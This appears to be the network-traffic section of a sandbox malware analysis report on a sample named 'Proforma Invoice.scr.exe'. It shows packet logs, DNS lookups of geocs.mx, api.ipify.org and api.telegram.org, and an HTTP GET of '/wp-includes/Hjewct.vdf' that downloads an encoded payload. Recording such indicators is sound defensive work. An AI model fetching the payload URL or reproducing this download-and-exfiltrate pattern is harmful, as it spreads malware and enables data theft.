                                                                                        Oct 31, 2024 11:14:10.107686996 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.107757092 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.108455896 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.108527899 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.154956102 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.155178070 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.219522953 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.219666004 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.226375103 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.226466894 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.227066040 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.227191925 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.273901939 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.274003983 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.338082075 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.338172913 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.344883919 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.344966888 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.345472097 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.345613003 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.392553091 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.392690897 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.393222094 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.393286943 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.464447975 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.464759111 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.464771032 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.464875937 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.511200905 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.511318922 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.511444092 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.511517048 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.583151102 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.583239079 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.583336115 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.583336115 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.583343983 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.583422899 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.583667040 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.583759069 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.630075932 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.630240917 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.675791979 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.675870895 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.701760054 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.701909065 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.702161074 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.702336073 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.744256020 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.744373083 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.750489950 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.750569105 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.794508934 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.794601917 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.820244074 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.820365906 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.820815086 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.820884943 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.862265110 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.862334967 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.867497921 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.867562056 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.867995977 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.868056059 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.938879013 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.938956022 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.939475060 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.939531088 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.980947018 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.981014013 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.986063004 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.986141920 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.986259937 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.986326933 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:11.277317047 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:11.277427912 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:11.277436018 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:11.277446985 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:11.277482033 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:11.277523994 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:11.277719021 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:11.277776003 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:11.277882099 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:11.277946949 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:11.278074026 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:11.278117895 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:11.278126001 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:11.278136015 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:11.278162956 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:11.278179884 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:11.282352924 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:11.282424927 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:11.282484055 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:11.282531023 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:11.283351898 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.370333910 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.410037994 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.410172939 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.446489096 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.446635008 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.447354078 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.447449923 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.526942015 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.527080059 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.563457012 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.563613892 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.563663006 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.563690901 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.563707113 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.563760042 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.604357004 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.604444981 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.644133091 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.644228935 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.680723906 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.680952072 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.681586027 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.681669950 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.760937929 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.761075020 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.761971951 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.762073994 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.797949076 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.798069954 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.798489094 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.798561096 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.878024101 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.878127098 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.878760099 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.878834009 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.916822910 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.916920900 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.917174101 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.917246103 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.955498934 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.955594063 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:41.995601892 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:41.995696068 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.034094095 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.034176111 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.034241915 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.034302950 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.035223007 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.035296917 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.112488985 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.112602949 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.113188982 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.113260984 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.151297092 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.151427984 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.151760101 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.151829958 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.152326107 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.152394056 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.229892969 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.230041981 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.268466949 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.268533945 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.268573046 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.268642902 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.268690109 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.268713951 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.269263983 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.269328117 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.270071030 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.270142078 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.347850084 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.347939014 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.385292053 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.385379076 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.385904074 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.385973930 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.386368990 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.386440039 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.386667967 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.386728048 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.464118004 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.464205027 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.464742899 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.464809895 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.502646923 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.502732038 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.503227949 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.503287077 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.503819942 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.503879070 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.773667097 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.773682117 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.773720026 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.773808002 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.773834944 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.773861885 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.774568081 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.774601936 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.774609089 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.774621010 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.774624109 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.774657965 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.774661064 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.774667978 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.774705887 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.774907112 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.774976969 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.775744915 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.775810003 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.779750109 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.779845953 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.779848099 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.779864073 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.779896975 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.780766010 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.780870914 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.780886889 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.781016111 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.781068087 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.781075954 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.781558990 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.781619072 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.781630039 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.815489054 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.815576077 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.815587997 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.815777063 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.815849066 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.815857887 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.854098082 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.854214907 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.854239941 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.854460001 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.854468107 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.854512930 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.854527950 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.854729891 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.854737997 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.854785919 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.854794025 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.854825020 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.855324030 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.855365038 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.855386019 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.855397940 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.855422020 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.895755053 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.895848036 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.895873070 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.933195114 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.933211088 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.933259964 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.933295012 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.933315992 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.933346033 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.970733881 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.970752954 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.970797062 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.970844030 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.970871925 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.970894098 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.971141100 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.971148968 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.971172094 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.971194983 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.971205950 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.971230984 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.971548080 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.971554995 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.971582890 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.971600056 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.971612930 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.971633911 CET49910443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:42.972250938 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.972259045 CET44349910173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:42.972307920 CET49910443192.168.2.6173.237.185.182
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 31, 2024 11:14:05.679869890 CET | 62026 | 53 | 192.168.2.6 | 1.1.1.1
Oct 31, 2024 11:14:06.189265966 CET | 53 | 62026 | 1.1.1.1 | 192.168.2.6
Oct 31, 2024 11:14:25.869194031 CET | 58949 | 53 | 192.168.2.6 | 1.1.1.1
Oct 31, 2024 11:14:25.876281023 CET | 53 | 58949 | 1.1.1.1 | 192.168.2.6
Oct 31, 2024 11:14:33.011075974 CET | 58386 | 53 | 192.168.2.6 | 1.1.1.1
Oct 31, 2024 11:14:33.018141985 CET | 53 | 58386 | 1.1.1.1 | 192.168.2.6
Oct 31, 2024 11:14:49.134283066 CET | 53 | 56062 | 162.159.36.2 | 192.168.2.6
Oct 31, 2024 11:14:50.215193033 CET | 53 | 58907 | 1.1.1.1 | 192.168.2.6
Oct 31, 2024 11:14:56.731761932 CET | 63922 | 53 | 192.168.2.6 | 1.1.1.1
Oct 31, 2024 11:14:56.739111900 CET | 53 | 63922 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 31, 2024 11:14:05.679869890 CET | 192.168.2.6 | 1.1.1.1 | 0x6e97 | Standard query (0) | geocs.mx | A (IP address) | IN (0x0001) | false
Oct 31, 2024 11:14:25.869194031 CET | 192.168.2.6 | 1.1.1.1 | 0xbf72 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Oct 31, 2024 11:14:33.011075974 CET | 192.168.2.6 | 1.1.1.1 | 0x49c6 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Oct 31, 2024 11:14:56.731761932 CET | 192.168.2.6 | 1.1.1.1 | 0x9578 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 31, 2024 11:13:59.323019981 CET | 1.1.1.1 | 192.168.2.6 | 0x255e | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | azurefd-t-fb-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 31, 2024 11:13:59.323019981 CET | 1.1.1.1 | 192.168.2.6 | 0x255e | No error (0) | dual.s-part-0017.t-0009.fb-t-msedge.net | s-part-0017.t-0009.fb-t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 31, 2024 11:13:59.323019981 CET | 1.1.1.1 | 192.168.2.6 | 0x255e | No error (0) | s-part-0017.t-0009.fb-t-msedge.net | | 13.107.253.45 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 11:14:06.189265966 CET | 1.1.1.1 | 192.168.2.6 | 0x6e97 | No error (0) | geocs.mx | | 173.237.185.182 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 11:14:25.876281023 CET | 1.1.1.1 | 192.168.2.6 | 0xbf72 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 11:14:25.876281023 CET | 1.1.1.1 | 192.168.2.6 | 0xbf72 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 11:14:25.876281023 CET | 1.1.1.1 | 192.168.2.6 | 0xbf72 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 11:14:33.018141985 CET | 1.1.1.1 | 192.168.2.6 | 0x49c6 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 11:14:56.739111900 CET | 1.1.1.1 | 192.168.2.6 | 0x9578 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                        • geocs.mx
                                                                                        • api.ipify.org
                                                                                        • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49737 | 173.237.185.182 | 443 | 4000 | C:\Users\user\Desktop\Proforma Invoice.scr.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 10:14:07 UTC | 80 | OUT | GET /wp-includes/Hjewct.vdf HTTP/1.1
    Host: geocs.mx
    Connection: Keep-Alive
2024-10-31 10:14:08 UTC | 183 | IN | HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 10:14:14 GMT
    Server: Apache
    Last-Modified: Tue, 29 Oct 2024 16:15:46 GMT
    Accept-Ranges: bytes
    Content-Length: 993808
    Connection: close
                                                                                        Data Ascii: DRRTO?>&9pBQ:(BU13@(.D%Lc3QV&"ISS>al?/"<.ubk3_&l2-O${}A$Kw%Rir-9e-TCv`0EeQ+64F'^uZ{AH#


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
